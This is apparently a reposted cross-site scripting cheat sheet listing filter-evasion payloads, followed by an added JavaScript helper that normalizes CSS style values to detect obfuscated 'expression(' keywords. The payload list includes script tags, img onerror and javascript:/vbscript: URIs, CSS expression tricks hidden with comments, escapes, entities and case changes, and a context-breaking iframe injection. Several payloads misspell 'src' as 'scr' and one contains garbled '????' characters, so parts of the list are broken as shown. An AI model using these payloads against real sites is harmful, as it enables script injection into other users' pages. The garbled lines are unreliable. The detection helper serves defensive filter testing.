<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace inserted with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
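
The expression variants in the list above (comment inside the keyword, CSS hex escape, HTML entity, changed case, Unicode form) all spell the same keyword, so a filter that matches the literal string on the raw value misses them. The following is an added example, not part of the original post: a detection helper that normalizes a style value before matching. The function names are hypothetical, the samples are constructed with a harmless body, and treating the "unicode" entry as a full-width character is an assumption.

```javascript
// Added example. Function names are hypothetical; all samples are constructed.
function decodeCodePoint(n) {
  // NUL and out-of-range values become U+FFFD instead of throwing.
  return n > 0 && n <= 0x10ffff ? String.fromCodePoint(n) : "\uFFFD";
}

function normalizeStyle(value) {
  return value
    // 1. HTML numeric character references (decoded in a style attribute).
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => decodeCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => decodeCodePoint(parseInt(d, 10)))
    // 2. CSS escapes: backslash, 1-6 hex digits, one optional whitespace.
    .replace(/\\([0-9a-f]{1,6})\s?/gi, (_, h) => decodeCodePoint(parseInt(h, 16)))
    // 3. CSS comments placed inside the keyword.
    .replace(/\/\*[\s\S]*?\*\//g, "")
    // 4. Full-width compatibility forms, then letter case.
    .normalize("NFKC")
    .toLowerCase();
}

// Literal match on the raw value: what a simple blacklist filter does.
function naiveCheck(value) {
  return value.includes("expression(");
}

// Same keyword, matched after normalization; whitespace before "(" allowed.
function hasCssExpression(value) {
  return /expression\s*\(/.test(normalizeStyle(value));
}

// Constructed style values, one per encoding trick; the body is a harmless "1".
const SAMPLES = [
  "width:expression(1)",          // plain
  "width:exp/* */ression(1)",     // comment inside the keyword
  "width:\\65 xpression(1)",      // CSS hex escape
  "width:&#x0065;xpression(1)",   // HTML entity
  "width:ExPrEsSiOn (1)",         // mixed case, space before "("
  "width:\uFF45xpression(1)",     // full-width "e"
  "width:150px",                  // benign
];

function report() {
  return SAMPLES.map((s) => ({
    sample: s,
    naive: naiveCheck(s),
    normalized: hasCssExpression(s),
  }));
}

console.table(report());
```

Matching after normalization is suited to log triage and regression tests for a filter. For rendering untrusted markup, an allowlist sanitizer combined with contextual output encoding is the control that does not depend on enumerating encodings.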